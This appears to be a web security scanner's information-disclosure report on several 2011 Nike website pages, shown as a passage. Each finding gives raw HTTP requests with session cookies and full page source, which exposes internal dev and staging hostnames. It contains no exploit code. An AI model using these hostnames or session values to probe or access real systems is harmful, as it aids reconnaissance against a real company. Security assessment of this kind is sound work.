NIKEOS.site_mode = 'dev';
NIKEOS.protocol = (location.protocol == 'https:') ? 'https://' : 'http://';
NIKEOS.currentURL = escape(location.href);
NIKEOS.BASE = {
localhost : NIKEOS.protocol + location.host,
dev : NIKEOS.protocol + (NIKEOS.siteHost || 'nike-dev4.ny.rga.com'),
staging : NIKEOS.protocol + (NIKEOS.siteHost || 'ecn10-www.nike.com'),
prod : NIKEOS.protocol + 'www.nike.com'
};
NIKEOS.setDev = function(url) {
NIKEOS.BASE.dev = NIKEOS.protocol + url;
};
/* End NIKEOS */
var site_data=
{
lang_locale:"en_US",
country:"US",
nav_current: "home",
commerce_mode:"US",
link_suffix:"",
region:"US",
platypus_region:"en_US",
blog_locale:"en_US",
tracking_region:"us",
video_region:"en_US"
};
var tracker_obj=
{
pageName:"USSC>home",
server:"nikesoccer",
channel:"soccer", // hard coded in - previously soccer
eVar4:"LOGGED_IN_STATUS",
eVar8:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop2:"FLASH_VERSION",
prop12:"soccer", // hard coded in - previously soccer
prop13:site_data.tracking_region.toLowerCase(),//region
prop14:site_data.country.toLowerCase(),//country
prop15:site_data.lang_locale.toLowerCase(),//lang
prop17:"home", // need to set this correctly - at present it is a duplicate of what was on the old tracker_obj
prop18:"homepage",
prop21:"brand",
prop22:"non-id",
prop27:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop50:"LOGGED_IN_ID",
trackExternalLinks:true,
linkInternalFilters:"javascript:,nike,rga"
};
var track_site = "USSC";
var currentUrl = window.location.href;
var trackingSuite = "nikesoccer,nikefootballnam,nikeall";
// Only include commerce rollup tag in commerce enabled pages (so far just Bootroom/Players)
if (currentUrl.indexOf("bootroom") != -1 || currentUrl.indexOf("players") != -1) {
trackingSuite = trackingSuite + ",";
}
var sitewide_tracker_obj =
{
account:trackingSuite,
currency:"USD",
charset:"UTF-8"
};
var nav_tracker_obj=
{
s_account:sitewide_tracker_obj.account,
prefix:"USSC>",
setup:
{
pageURL:location.href,
referrer:document.referrer
},
persistent:
{
server:"nikesoccer",
channel:"soccer",
prop12:"nikefootball",
prop13:site_data.tracking_region.toLowerCase(),//region
prop14:site_data.country.toLowerCase(),//country
prop15:site_data.lang_locale.toLowerCase(),//lang
prop21:"brand",
prop22:"non-id",
prop27:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop50:"LOGGED_IN_ID"
}
};
</script>
<script type="text/javascript" src="/nikeos/global/js/ppk.browser.js"></script>
<script type="text/javascript" src="/nikeos/global/js/dalewarth.js"></script>
<script type="text/javascript" charset="utf-8">
var NIKE_COMMERCE_CONFIG={ title : "Nike Football" , site : "nikefootball" , membershipId : "304" , registerPath : "nikeos/p/nikefootball/${LANG_LOCALE}/profile?page=register&fields=&continueURL=profile%3Fpage%3Dpersonal_info" , siteId : "47" , siteId_EMEA : "48" , userType : "defaultUser" , categoryHeadersEnabled : "true" , languageTunnelURL : "/nikeos/p/nikefootball/language_tunnel/?change" , configBaseURL : "/nikefootball/global/xml/commerce/" , commerceBaseURL : "commerce" , US_Catalog : "102601" , EMEA_Catalog : "102602" , commerceNavTabs : [ "shop" , "products" , "nikeid" , "nikeid_landing" ] , DETERMINE_COMMERCE_REGION : { en_US : { US : "1" } , en_GB : { AT : "2" , BE : "2" , DK : "2" , FI : "2" , FR : "2" , DE : "2" , IE : "2" , IT : "2" , LU : "2" , NL : "2" , ES : "2" , SE : "2" , GB : "2" , CZ : "2" , GR : "2" , HU : "2" , NO : "0" , PL : "2" , PT : "2" , SI : "2" , CH : "0" } , es_ES : { ES : "2" } , de_DE : { DE : "2" , AT : "2" } , fr_FR : { FR : "2" } , it_IT : { IT : "2" } , cs_CZ : { CZ : "3" } , pl_PL : { PL : "3" } } };
</script>
<script type="text/javascript" src="/nikeos/global/js/nikecommerce.js"></script>
<!-- begin homepage header -->
<title>Nike Soccer - World-class soccer cleats. World-class pros.</title>
<link type="text/css" rel="stylesheet" href="/nikefootball/assets/homepage/css/modules/homepanel.css" media="screen"/>
<script type="text/javascript" src="/nikefootball/assets/homepage/js/modules/jquery.color.js"></script>
<script type="text/javascript" src="/nikefootball/assets/homepage/js/modules/jquery.crossFadeCarousel.js"></script>
<script type="text/javascript">
// set the body background-color changes (if any)
nf.gv.fadeBodyColors = [
'#000',
'#000',
'#000',
'#000',
'#000',
'#000',
'#000',
'#000',
'#000',
'#000',
'#000',
'#000',
'#000'
];
</script> <script type="text/javascript" src="/nikefootball/assets/homepage/js/modules/homepanel.js"></script>
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="/nikefootball/assets/homepage/css/ie/ie.css"/>
<![endif]-->
<!--[if IE 6]>
<link rel="stylesheet" type="text/css" href="/nikefootball/assets/homepage/css/ie/ie6.css"/>
<script type="text/javascript" src="/nikefootball/global/js/DD_belatedPNG.js"></script>
<script type="text/javascript">
DD_belatedPNG.fix('.miniPDPmarker img, #touts, .nikeplusinner .hdr img, .png');
</script>
<![endif]-->
<link rel="stylesheet" href="/nikefootball/assets/homepage/css/locales/en_US.css" type="text/css" media="screen"/>
<!-- end homepage header -->
</head>
<body id="homepage" class="home">
<div id="fb-root"></div>
<script>
window.fbAsyncInit = function() {
FB.init({appId: '120836677942069', status: true, cookie: true, xfbml: true});
};
(function() {
var e = document.createElement('script');
e.async = true;
e.src = document.location.protocol + "//connect.facebook.net/en_US/all.js"; <!-- needed fix for latam and emea -->
document.getElementById('fb-root').appendChild(e);
}());
</script>
<noscript><div class="noscriptmsg">You need to enable JavaScript to get the most out of the Nike Soccer web site.</div></noscript>
<div id="p_outerwrapper">
<div id="p_outerwrapperinner">
<div id="p_innerwrapper" class="en_us">
<div id="p_innerwrapperheader">
<div id="p_contentstub">
<ul>
<li><p class="breadcrumb"><a href="http://www.nike.com/">Nike</a> &gt; Nike Soccer</li>
<li><h1><strong>World-class soccer cleats. World-class pros. NikeSoccer.com</strong></h1></li>
</ul>
<div class="cf">
<div class="leftcol">
<p>Nike Soccer is the home of the world’s most innovative <a title="" href="http://www.nike.com/nikefootball/bootroom/boots/?locale=en_US">soccer cleats</a>, best players and all-conquering teams.</p>
<p>This is the place to get the in-depth lowdown on everything: from Nike cleats, teams and kits to tailored <a title="" href="http://www.nike.com/nikefootball/training/home?locale=en_US">soccer training programs</a> and exclusive athlete insights.</p>
<p>Hit the team pages to explore the Catalan pride of <a title="" href="http://www.nike.com/nikefootball/teams/barcelona?locale=en_US">FC Barcelona</a> and the domestic dominance of <a title="" href="http://www.nike.com/nikefootball/teams/man_utd?locale=en_US">Manchester United</a> or the player pages for the individual brilliance of <a title="" href="http://www.nike.com/nikefootball/players/cescfabregas?locale=en_US">Fabregas</a>, <a title="" href="http://www.nike.com/nikefootball/players/sergioaguero?locale=en_US">Aguero</a> and <a title="" href="http://www.nike.com/nikefootball/players/cristianoronaldo?locale=en_US">Cristiano Ronaldo</a>.</p>
<p>Choose your weapon from the Nike Bootroom: will it be <a title="" href="http://www.nike.com/nikefootball/bootroom/boots/mercurial?locale=en_US">Mercurial</a> speed or the <a title="" href="http://www.nike.com/nikefootball/bootroom/boots/tiempo?locale=en_US">Tiempo</a> touch? Will you take control with the <a title="" href="http://www.nike.com/nikefootball/bootroom/boots/ctr360?locale=en_US">CTR360</a> or master accuracy with the <a title="" href="http://www.nike.com/nikefootball/bootroom/boots/t90?locale=en_US">T90</a>?</p>
</div>
<div class="rightcol">
<p>Whatever your playing style, enhance your skills with Nike Soccer+. Buy your soccer cleats, get the code, and unlock unique tips, videos and advice from world-class players like <a title="" href="http://www.nike.com/nikefootball/players/waynerooney?locale=en_US">Rooney</a> and Torres.</p>
<p>Push your soccer training to the ultimate with the Ronaldo speed test in the Master Speed training program or perfect your skills with specialised <a title="" href="http://www.nike.com/nikefootball/training/home?locale=en_US">training drills</a> and signature moves.</p>
<p>Welcome home..</p>
</div>
<..
- /sportswear/features/love-to-run

/sportswear/features/love-to-run

http://www.nike.com/sportswear/features/love-to-run?locale=en_US

Identified Internal Path(s)

/dev/i

Request

GET /sportswear/features/love-to-run?locale=en_US HTTP/1.1
Referer: http://www.nike.com/nikeos/p/sportswear/en_US/?country=US&lang_locale=en_US&blog=en_US&sitesrc=uslp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Cookie: AnalysisUserId=66.160.206.42.1303153343316183; BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html;charset=utf-8
Content-Length: 7267
Cache-Control: max-age=796
Expires: Mon, 18 Apr 2011 19:30:41 GMT
Date: Mon, 18 Apr 2011 19:17:25 GMT
Connection: keep-alive


<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta name="title" content="Nike Sportswear - Love To Run"/>
<meta name="description" content="love to run"/>
<meta name="keywords" content="love to run, Harry AA, Radha Medar, Jack Greer"/>
<meta http-equiv="imagetoolbar" content="no"/>
<meta http-equiv="X-UA-Compatible" content="chrome=1;IE=7" />
<meta name="search_section" content="general" />
<meta name="category" content="football" />
<meta name="locale" content="en_US" />
<link rel="shortcut icon" href="/favicon.ico"/>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/framework/v1/css/framework.css" />
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/framework/v1/css/framework-ie.css" />
<![endif]-->
<!--[if IE 6]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/framework/v1/css/framework-ie6.css" />
<![endif]-->
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/json2.min.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/jquery.cookie.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/swfobject-1.5.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/swfobject-2.1.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/f4a_js.js"></script>
<script type="text/javascript" src="/nikeos/global/js/eventbridge.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/cufon-yui-1.0.9.js"></script>
<script type="text/javascript">var fontFamily = "global";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/DIN.js"></script>
<script type="text/javascript">var fontFamily = "header";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/RHODES.js"></script>
<script type="text/javascript">var fontFamily = "body";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/HELVETICA.js"></script>
<script type="text/javascript">var fontFamily = "buttons";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/HELVETICA.js"></script>
<script type="text/javascript">var fontFamily = "brand";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/RHODES.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/plugins/videoplayer/jquery.videoplayer.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/framework.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/services.js"></script>
<script type="text/javascript">
// Switch JQuery to use $ as well as JQ for legacy purposes if switched on in config XML
var $ = jQuery;
var JQ = jQuery;
ns.gv.locale = "en_US";
ns.gv.language = "en";
ns.gv.country = "us";
ns.gv.textReplacement = true;
ns.gv.commerceCountries = "CZ,AT,CH,DE,BE,DE,DK,ES,FI,FR,GB,GR,HU,IE,IT,LU,NL,NO,PL,PT,SE,SI";
ns.gv.site_mode = "prod";
ns.gv.blog_base_url = "http://inside.nike.com";
ns.gv.base_url = "http://www.nike.com";
ns.gv.commerce_url = "http://store.nike.com";
ns.gv.base_secure_url = "https://www.nike.com";
ns.gv.social_url = "http://www.nikegadgets.com/";
ns.gv.social_secure_url = "https://secure-www.nikegadgets.com/";
ns.gv.upm_service_url = "https://www.nike.com/services/profileService";
ns.gv.services_urlPrefix = "/nsl";
ns.gv.trackingEnabled = true;
ns.gv.navigationItem = "love_to_run";
ns.gv.modals = {};
ns.gv.modals.global = {
close: 'Close'
};
ns.gv.modals.video = {
};
ns.gv.modals.tos = {
title: 'Terms and Conditions',
header: 'Terms of Use and Privacy Policy Update',
copy: 'Nike has expanded the features in the site you are visiting and we have updated our <a target="_blank" href="http://www.nike.com/privacy/index.jsp">Privacy Policy and Terms of Use</a>. To continue on to the site, please review the updated <a target="_blank" href="http://www.nike.com/privacy/index.jsp">Terms of Use and Privacy Policy</a> and select ACCEPT. If you do not want to accept the Terms of Use, select CANCEL to be logged out and returned to the Nike Football home page.',
cancel: 'CANCEL',
accept: 'ACCEPT'
};
ns.gv.useFontNames = false;
</script>
<style type="text/css">
body { background-image:url(/sportswear/assets/images/common/bg-home.jpg); }
</style>
<!--
prop18: love-to-run
-->
<script type="text/javascript" charset="utf-8">
// Updated on 15/4/2010 : NWH
// CAN BE REINSTATED AFTER SWFOBJECT 1.5 REMOVED
/*
var deconcept = {};
deconcept.SWFObjectUtil = {};
deconcept.SWFObjectUtil.getPlayerVersion = function(){
var flashVersion = swfobject.getFlashPlayerVersion();
var toReturn = { "major": flashVersion.major, "minor": flashVersion.minor, "rev": flashVersion.release };
return toReturn;
}
*/
/* NIKEOS */
if (!window.NIKEOS) var NIKEOS = {};
/*
SET THE SITE MODE
*/
if (location.host.match(/inside-staging/i) || location.host.match(/(env\d*)-brand/i) || location.host.match(/(ecn\d*)-www/i) || location.host.match(/dev/i))
NIKEOS.site_mode = 'staging';
else if (location.host.match(/nike\.com/i))
NIKEOS.site_mode = 'prod';
else if (location.host.match(/^[^\.]*$/i))
NIKEOS.site_mode = 'localhost';
else
NIKEOS.site_mode = 'dev';
NIKEOS.protocol = (location.protocol == 'https:') ? 'https://' : 'http://';
NIKEOS.currentURL = escape(location.href);
NIKEOS.BASE = {
localhost : NIKEOS.protocol + location.host,
dev : NIKEOS.protocol + (NIKEOS.siteHost || 'nike-dev4.ny.rga.com'),
staging : NIKEOS.protocol + (NIKEOS.siteHost || 'ecn10-www.nike.com'),
prod : NIKEOS.protocol + 'www.nike.com'
};
NIKEOS.setDev = function(url) {
NIKEOS.BASE.dev = NIKEOS.protocol + url;
};
/* End NIKEOS */
var site_data=
{
lang_locale:"en_US",
country:"US",
nav_current: "love_to_run",
commerce_mode:"US",
link_suffix:"",
region:"US",
platypus_region:"en_US",
blog_locale:"en_US",
tracking_region:"us",
video_region:"en_US"
};
var tracker_obj=
{
pageName:"USSPRT>features\>love_to_run>landing",
server:"nikesoccer",
channel:"sportswear", // hard coded in - previously soccer
eVar4:"LOGGED_IN_STATUS",
eVar8:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop2:"FLASH_VERSION",
prop12:"sportswear", // hard coded in - previously soccer
prop13:site_data.tracking_region.toLowerCase(),//region
prop14:site_data.country.toLowerCase(),//country
prop15:site_data.lang_locale.toLowerCase(),//lang
prop17:"home", // need to set this correctly - at present it is a duplicate of what was on the old tracker_obj
prop18:"love-to-run",
prop21:"brand",
prop22:"non-id",
prop27:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop50:"LOGGED_IN_ID",
trackExternalLinks:true,
linkInternalFilters:"javascript:,nike,rga"
};
var track_site = "USSPRT";
var currentUrl = window.location.href;
var trackingSuite = "nikesportswearus,nikesportswearnam,nikeall";
// Only include commerce rollup tag in commerce enabled pages (so far just Bootroom/Players)
if (currentUrl.indexOf("bootroom") != -1 || currentUrl.indexOf("players") != -1) {
trackingSuite = trackingSuite + ",";
}
var sitewide_tracker_obj =
{
account:trackingSuite,
currency:"USD",
charset:"UTF-8"
};
var nav_tracker_obj=
{
s_account:sitewide_tracker_obj.account,
prefix:"USSPRT>",
setup:
{
pageURL:location.href,
referrer:document.referrer
},
persistent:
{
server:"nikesoccer",
channel:"soccer",
prop12:"sportswear",
prop13:site_data.tracking_region.toLowerCase(),//region
prop14:site_data.country.toLowerCase(),//country
prop15:site_data.lang_locale.toLowerCase(),//lang
prop21:"brand",
prop22:"non-id",
prop27:site_data.tracking_region.toLowerCase()+"|"+site_data.country.toLowerCase()+"|"+site_data.lang_locale.toLowerCase(), //region|country|lang
prop50:"LOGGED_IN_ID"
}
};
</script>
<script type="text/javascript" src="/nikeos/global/js/ppk.browser.js"></script>
<script type="text/javascript" src="/nikeos/global/js/dalewarth.js"></script>
<script type="text/javascript" charset="utf-8">
var NIKE_COMMERCE_CONFIG={ title : "Nike Football" , site : "sportswear" , membershipId : "304" , registerPath : "nikeos/p/sportswear/${LANG_LOCALE}/profile?page=register&fields=&continueURL=profile%3Fpage%3Dpersonal_info" , siteId : "47" , siteId_EMEA : "48" , userType : "defaultUser" , categoryHeadersEnabled : "true" , languageTunnelURL : "/nikeos/p/sportswear/language_tunnel/?change_region=true\n\n" , configBaseURL : "/sportswear/global/xml/commerce/" , commerceBaseURL : "commerce" , US_Catalog : "102601" , EMEA_Catalog : "102602" , commerceNavTabs : [ "shop" , "products" , "nikeid" , "nikeid_landing" ] , DETERMINE_COMMERCE_REGION : { en_US : [ { US : "1" } , { AT : "2" , BE : "2" , DK : "2" , FI : "2" , FR : "2" , DE : "2" , IE : "2" , IT : "2" , LU : "2" , NL : "2" , ES : "2" , SE : "2" , GB : "2" , CZ : "2" , GR : "2" , HU : "2" , NO : "3" , PL : "2" , PT : "2" , SI : "2" , CH : "3" } ] , es_ES : { ES : "2" } , de_DE : { DE : "2" } , fr_FR : { FR : "2" } , it_IT : { IT : "2" } , cs_CZ : { CZ : "3" } , pl_PL : { PL : "3" } } };
</script>
<script type="text/javascript" src="/nikeos/global/js/nikecommerce.js"></script>
<!-- For deep linking - create a pageid global var -->
<!-- begin features header -->
<title>Nike Sportswear - Love To Run</title>
<link type="text/css" rel="stylesheet" href="/sportswear/assets/features/love-to-run/css/common.css" media="screen"/>
<script type="text/javascript" src="/sportswear/assets/features/love-to-run/js/common.js"></script>
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/features/love-to-run/css/ie/ie.css"/>
<![endif]-->
<!--[if IE 6]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/features/love-to-run/css/ie/ie6.css"/>
<![endif]-->
<link rel="stylesheet" href="/sportswear/assets/features/love-to-run/css/locales/en_US.css" type="text/css" media="screen"/>
<!-- end features header -->
</head>
<body id="love-to-run-body" class="features">
<div id="bodywrapper">
<noscript><div class="noscriptmsg">You need to enable JavaScript to get the most out of the Nike Football web site.</div></noscript>
<div id="p_outerwrapper">
<div id="p_outerwrapperinner">
<div id="p_innerwrapper" class="en_us">
<div id="p_innerwrapperheader">
<div id="p_contentstub">
<ul>
<li><p class="breadcrumb"><a href="http://www.nike.com/">Nike</a> &gt; <a href="/nikeos/p/sportswear/en_US/">Nike Sportswear</a> &gt; Love To Run</li>
<li><h1><strong>Nike Sportswear</strong></h1></li>
</ul>
<div class="cf">
<div class="leftcol fullwidth">
<p>People love to run. They love it for all sorts of reasons - physical health, mental balance, focus, escape, camaraderie, solitude and on and on. In fact, even people who hate to run love to run because they know it makes them a better striker, tackler, receiver, base-runner, counter-puncher, biker or what have you. That's cool. But it's only part of the story. There's this other side. The thing they live for.</p>
</div>
</div>
</div>
<div id="p_lozenge">
<div id="nav-module-top_swf"></div>
</div>
<div id="p_navigation">
<div class="navigationinner">
<div id="nav-module">
<form id="nav_input_form" action="javascript:search()" method="post"><input id="nav_input" type="text" name="searchquery" size="10"/></form>
<div id="nav-module-left_swf">
<!-- NAV XML OBJECT, SITEXML AT BOTTOM -->
<div id="nav" default_font="Victory-Neue Bold" embed_font="true" class="invisible">
<div id="search" font="Victory-Neue Light">
<a class="base" href="http://www.nike.com/nikeos/p/sportswear/en_US/search?" ></a>
<div class="displayText" label="openLabel" >SEARCH</div>
<div class="displayText" label="closeLabel">CLOSE</div>
<span class="query">srch=</span>
</div>
<!-- Profile -->
<div id="profile" preload="true" href="https://www.nike.com/services/profileService?action=getprofile">
<a id="login" href="https://www.nike.com/nikeos/p/sportswear/en_US/profile?page=signin">LOGIN</a>
<a id="logout" href="https://www.nike.com/services/profileService?action=logout">LOGOUT</a>
<a id="account" href="https://www.nike.com/nikeos/p/sportswear/en_US/profile?page=mynike">VIEW MY PROFILE</a>
<span id="profile">PROFILE</span>
<span class="name">fields=screenname</span>
</div>
<!-- AUDIO PLAYER
<div class="audioButton" href="/sportswear/us/en_US/xml/flashmodule/audioplayer/audioConfig.xml"></div>
-->
<!-- PRODUCTS -->
<div class="primaryButton" label="shop" openonclick="true" commerce_dependant="true">
<a class="action" type="none" href="#">SHOP</a>
<div class="secondaryButton" label="men" openonclick="false">
<a class="action" type="none">Men</a>
<div class="tertiaryPanel">
<a class="action" type="url" href="http://www.nike.com/nikeos/p/sportswear/en_US/commerce/men?hf=10002^4294965514^4294967157&p=PWP&t=Men%27s%20Products" position="top">All</a>
<div class="tertiaryColumn" label="men_shoes" title="Shoes" width="130">
<div class="tertiaryButton" label="men_shoes_af1">
<a class="action" type="url" href="http://www.nike.com/nikeos/p/sportswear/en_US/commerce/men?hf=10002^12001^4294961611^4294965496^4294965514^4294967157&p=PWP&t=Men%27s%20Air%20Force%201%20Shoes">Air Force 1</a>
</div>
<div class="tertiaryButton" label="men_shoes_am">
<a class="action" type="url" href="http://www.nike.com/nikeos/p/sportswear/en_US/commerce/men?hf=10002^12001^4294961626^4294965496^4294965514^4294967157&p=PWP&t=Men%27s%20Air%20Max%20Shoes">Air Max</a>
</div>
<div class="tertiaryButton" label="men_shoes_cortez">
<a class="action" type="url" href="http://www.nike.com/nikeos/p/sportswear/en_US/commerce/men?hf=..
- /sportswear/aw77/more-than

/sportswear/aw77/more-than

http://www.nike.com/sportswear/aw77/more-than?locale=en_US

Identified Internal Path(s)

/dev/i

Request

GET /sportswear/aw77/more-than?locale=en_US HTTP/1.1
Referer: http://www.nike.com/nikeos/p/sportswear/en_US/?country=US&lang_locale=en_US&blog=en_US&sitesrc=uslp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nike.com
Cookie: AnalysisUserId=66.160.206.42.1303153343316183; BSESSIONID=CbVNbLhxYnCIeM8XT7vNuQ**.sin-20-brand-1
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Apache
X-Swooshlet: 226103.0 app-brand-0
Vary: Accept-Encoding
Content-Encoding:
Content-Type: text/html;charset=utf-8
Content-Length: 8013
Cache-Control: max-age=854
Expires: Mon, 18 Apr 2011 19:31:43 GMT
Date: Mon, 18 Apr 2011 19:17:29 GMT
Connection: keep-alive


<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta name="title" content="Nike Sportswear"/>
<meta name="description" content="AW77 Insiders. Take it to the Street. The code says don't play your style straight - mix it, twist, break it. From the AW77 to the AM90, let the Nike Sportswear Insiders show you their combination to unlocking the look."/>
<meta name="keywords" content="aw77, am90, sportswear insiders"/>
<meta http-equiv="imagetoolbar" content="no"/>
<meta http-equiv="X-UA-Compatible" content="chrome=1;IE=7" />
<meta name="search_section" content="general" />
<meta name="category" content="football" />
<meta name="locale" content="en_US" />
<link rel="shortcut icon" href="/favicon.ico"/>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/framework/v1/css/framework.css" />
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/framework/v1/css/framework-ie.css" />
<![endif]-->
<!--[if IE 6]>
<link rel="stylesheet" type="text/css" href="/sportswear/assets/framework/v1/css/framework-ie6.css" />
<![endif]-->
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/json2.min.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/jquery.cookie.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/swfobject-1.5.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/swfobject-2.1.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/f4a_js.js"></script>
<script type="text/javascript" src="/nikeos/global/js/eventbridge.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/lib/cufon-yui-1.0.9.js"></script>
<script type="text/javascript">var fontFamily = "global";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/DIN.js"></script>
<script type="text/javascript">var fontFamily = "header";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/RHODES.js"></script>
<script type="text/javascript">var fontFamily = "body";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/HELVETICA.js"></script>
<script type="text/javascript">var fontFamily = "buttons";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/HELVETICA.js"></script>
<script type="text/javascript">var fontFamily = "brand";</script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/fonts/active/RHODES.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/plugins/videoplayer/jquery.videoplayer.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/framework.js"></script>
<script type="text/javascript" src="/sportswear/assets/framework/v1/js/services.js"></script>
<script type="text/javascript">
// Switch JQuery to use $ as well as JQ for legacy purposes if switched on in config XML
var $ = jQuery;
var JQ = jQuery;
ns.gv.locale = "en_US";
ns.gv.language = "en";
ns.gv.country = "us";
ns.gv.textReplacement = true;
ns.gv.commerceCountries = "CZ,AT,CH,DE,BE,DE,DK,ES,FI,FR,GB,GR,HU,IE,IT,LU,NL,NO,PL,PT,SE,SI";
ns.gv.site_mode = "prod";
ns.gv.blog_base_url = "http://inside.nike.com";
ns.gv.base_url = "http://www.nike.com";
ns.gv.commerce_url = "http://store.nike.com";
ns.gv.base_secure_url = "https://www.nike.com";
ns.gv.social_url = "http://www.nikegadgets.com/";
ns.gv.social_secure_url = "https://secure-www.nikegadgets.com/";
ns.gv.upm_service_url = "https://www.nike.com/services/profileService";
ns.gv.services_urlPrefix = "/nsl";
ns.gv.trackingEnabled = true;
ns.gv.navigationItem = "aw77_morethan";
ns.gv.modals = {};
ns.gv.modals.global = {
close: 'Close'
};
ns.gv.modals.video = {
};
ns.gv.modals.tos = {
title: 'Terms and Conditions',
header: 'Terms of Use and Privacy Policy Update',
copy: 'Nike has expanded the features in the site you are visiting and we have updated our <a target="_blank" href="http://www.nike.com/privacy/index.jsp">Privacy Policy and Terms of Use</a>. To continue on to the site, please review the updated <a target="_blank" href="http://www.nike.com/privacy/index.jsp">Terms of Use and Privacy Policy</a> and select ACCEPT. If you do not want to accept the Terms of Use, select CANCEL to be logged out and returned to the Nike Football home page.',
cancel: 'CANCEL',
accept: 'ACCEPT'
};
ns.gv.useFontNames = false;
</script>
<style type="text/css">
body { background-image:url(/sportswear/assets/images/common/bg-home.jpg); }
</style>
<!--
prop18: aw77_more_than
-->
<script type="text/javascript" charset="utf-8">
// Updated on 15/4/2010 : NWH
// CAN BE REINSTATED AFTER SWFOBJECT 1.5 REMOVED
/*
var deconcept = {};
deconcept.SWFObjectUtil = {};
deconcept.SWFObjectUtil.getPlayerVersion = function(){
var flashVersion = swfobject.getFlashPlayerVersion();
var toReturn = { "major": flashVersion.major, "minor": flashVersion.minor, "rev": flashVersion.release };
return toReturn;
}
*/
/* NIKEOS */
if (!window.NIKEOS) var NIKEOS = {};
/*
SET THE SITE MODE
*/
if (location.host.match(/inside-staging/i) || location.host.match(/(env\d*)-brand/i) || location.host.match(/(ecn\d*)-www/i) || location.host.match(/dev/i))
NIKEOS.site_mode = 'staging';
else if (location.host.match(/nike\.com/i))
NIKEOS.site_mode = 'prod';
else if (location.host.match(/^[^\.]*$/i))
NIKEOS.site_mode = 'localhost';
else
NIKEOS.site_mode = 'dev';
NIKEOS.protocol = (location.protocol == 'https:') ? 'https://' : 'http://';
NIKEOS.currentURL = escape(location.href);
NIKEOS.BASE = {
localhost : NIKEOS.protocol + location.host,
dev : NIKEOS.protocol + (NIKEOS.siteHost || 'nike-dev4.ny.rga.com'),
staging : NIKEOS.protocol + (NIKEOS.siteHost || 'ecn10-www.nike.com'),
prod : NIKEOS.protocol + 'www.nike.com'
};
NIKEOS.setDev = function(url) {
NIKEOS.BASE.dev = NIKEOS.protocol + url;
};
/* End NIKEOS */
var site_data=
{
lang_locale:"en_US",
country:"US",
nav_current: "aw77_morethan",
commerce_mode:"US",
link_suffix:"",
region:"US",
platypus_region:"en_US",
blog_locale:"en_US",
tracking_region:"us",
video_region:"en_US"
};
var tracker_obj=
{
pageName:"USSPRT>aw77\>more_than>landing",
server:"nikesoccer",
channel:"sportswear", // hard coded in - previously soccer
